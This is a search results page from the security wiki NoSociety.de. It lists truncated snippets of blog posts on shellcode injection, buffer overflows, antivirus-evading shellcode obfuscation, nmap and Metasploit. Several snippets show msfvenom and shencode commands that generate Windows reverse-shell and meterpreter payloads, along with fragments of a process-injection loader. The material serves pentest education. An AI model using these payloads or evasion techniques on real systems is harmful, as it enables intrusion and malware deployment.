NoSociety.de

Unten sind die Ergebnisse Ihrer Suche gelistet.

Passende Seitennamen:

Volltextergebnisse:

Obfuscation: polymorphic in-memory decoder @en:it-security:blog: 47 Treffer, Zuletzt geändert: vor 9 Monaten; d at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was rec... amed. The decoder starts with this instruction: <code asm> _start: jmp short call_decoder ; Begin of JMP-CALL-POP </code> ''%%JMP-CALL-POP%%'' is a technique that allows us to execute code independently of memory. In this first step, we n
Shellcode Injection Part 4 @en:it-security:blog: 47 Treffer, Zuletzt geändert: vor 10 Monaten; of ''calc.exe'' on a Windows computer * 64-bit code * Avoid null bytes ===== Preparations ===== =... t from [[https://www.ired.team/offensive-security/code-injection-process-injection/finding-kernel32-base... e used for the structure of the shellcode. ===== Code: Step by step ===== You can also find the complete code on [[https://github.com/psycore8/nosoc-shellcode/
Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog: 40 Treffer, Zuletzt geändert: vor 10 Monaten; ssue a system command when calling the function <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Dependencies ===== * socat mod [[... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog: 36 Treffer, Zuletzt geändert: vor 11 Monaten; ileges.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== Deactivate ASLR ==== ASLR must be de... ivated so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
Shellcode Injection Part 1 @en:it-security:blog: 31 Treffer, Zuletzt geändert: vor 11 Monaten; rmat | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST... ta_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c </code> \\ \\ ===== C++ Injector ===== We create a new ... = 540; int main(int argc, char** argv) { char* code; printf("#nosoc - expecttheunexpected"); code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_E
Helpful NMAP scanner commands: 30 Treffer, Zuletzt geändert: vor 17 Monaten; === Command Set ===== ==== Discover Hosts ==== <code bash> export IPRANGE='172.16.0.0/16' nmap -e tun0 -sn -v -oA pingscan $IPRANGE </code> ==== Parse Results ==== <code bash> grep Up pingscan.gnmap | awk '{print$2}' > 172_16_ping_ips.txt </code> ==== Discover Services ==== <code bash> nmap -
Obfuscation: ByteSwapping @en:it-security:blog: 29 Treffer, Zuletzt geändert: vor 7 Monaten; %%''|''%%F9%%''|''%%12%%''|''%%D1%%''| ===== The code ===== ==== Step 1: Python Encoder ==== The corr... e array * Return the byte array as the result <code python> def encrypt(data: bytes, xor_key: int... e = enc_byte return bytes(transformed) </code> ==== Step 2: Assembly ==== Now the assembly mu... cancels the encryption. You can find the complete code at the end of the article. === Step 2.1: Initial
Shellcode Injection Part 3 @en:it-security:blog: 24 Treffer, Zuletzt geändert: vor 12 Monaten; ome circumstances it may be necessary to load the code for the shell in the second step. In this blog p... a file via HTTP and then execute it. \\ \\ ===== Code ===== ==== C++ source ==== First, we need a sma... e shellcode into memory and then jumps into it. <code cpp> ... //buf represents the shellcode unsigned ... jump __asm { mov eax, target jmp eax } } </code> You can find the complete code in the [[https:/
Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog: 23 Treffer, Zuletzt geändert: vor 10 Monaten; 80568|kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Dependencies ===== What is needed? ... fer_overflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deactivate ASLR ===== ASLR must also be deactivated
Shellcode Injection Part 2 @en:it-security:blog: 23 Treffer, Zuletzt geändert: vor 11 Monaten; e tools as in part 1. You can download the source code from the [[https://github.com/psycore8/nosoc-shellcode|Github repository]]. \\ \\ ===== Code ===== ==== Explanation ==== Our code should receive the PID of the target process as a parameter at s... 'with the return value of the programme handle. <code cpp> processHandle = OpenProcess(PROCESS_ALL_ACCE
Group Managed Service Accounts: 22 Treffer, Zuletzt geändert: vor 17 Monaten; Preparations ===== Create root key on the DC: <code powershell> Add-KdsRootKey -EffectiveImmediately </code> Then wait 10 hours to ensure that the replicati... MSA account ===== ==== Create ==== On the DC: <code powershell> New-ADServiceAccount -Name <ACCOUNTNA... llowedToRetrieveManagedPassword <COMPUTERNAME>$ </code> ==== test ==== On the target system: <code po
Obfuscation: Disguise shellcode as UUIDs @en:it-security:blog: 18 Treffer, Zuletzt geändert: vor 10 Monaten; This is usually recognised by Windows Defender. <code bash> python shencode.py create -c="-p windows/x6... T=IPADDRESS LPORT=PORT -f raw -o shell_rev.raw" </code> ==== encode ==== We now encode this payload as UUID strings. <code bash> python shencode.py encode -f shell_rev.raw -u </code> The output now looks something like this: <cod
Host Discovery with Metasploit database: 16 Treffer, Zuletzt geändert: vor 10 Monaten; se and set up a user with access rights for it. <code bash> root@kali:~# msfdb init Creating database u... g/database.yml Creating initial database schema </code> ===== Metasploit: Connect database ===== <code ruby> msf6 > db_connect user:pass@127.0.0.1/db_name </code> ==== Check connection ==== <code ruby> msf6 >
SMB Hardening: 14 Treffer, Zuletzt geändert: vor 17 Monaten; Powershell (admin rights required) as follows: <code powershell>Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> SMBv1 can also be deactivated via Powershell (restart required): <code powershell>Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</code> === Server === The same commands apply to ser
FatCat Attack PoC @en:it-security:blog: 14 Treffer, Zuletzt geändert: vor 17 Monaten; rity pentest}} ====== FatCat Attack PoC ====== <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> | @orange:This PoC is for demonstration and tra... payload ==== * Start Metasploit * Open cmd <code dos>cmd</code> * Generate payload <code dos>msfvenom -a x86 –platform windows -p windows/meterprete
Privilege escalation: Windows admin thanks to Linux @en:it-security:blog: 12 Treffer, Zuletzt geändert: vor 10 Monaten
nmap SMBv1 Scan via Script: 6 Treffer, Zuletzt geändert: vor 17 Monaten
64-Bit Stack CheatSheet: 4 Treffer, Zuletzt geändert: vor 10 Monaten
Buffer Overflows - Intro: 4 Treffer, Zuletzt geändert: vor 11 Monaten
Secure passwords: 4 Treffer, Zuletzt geändert: vor 17 Monaten
OSI layer cyber attacks: 3 Treffer, Zuletzt geändert: vor 17 Monaten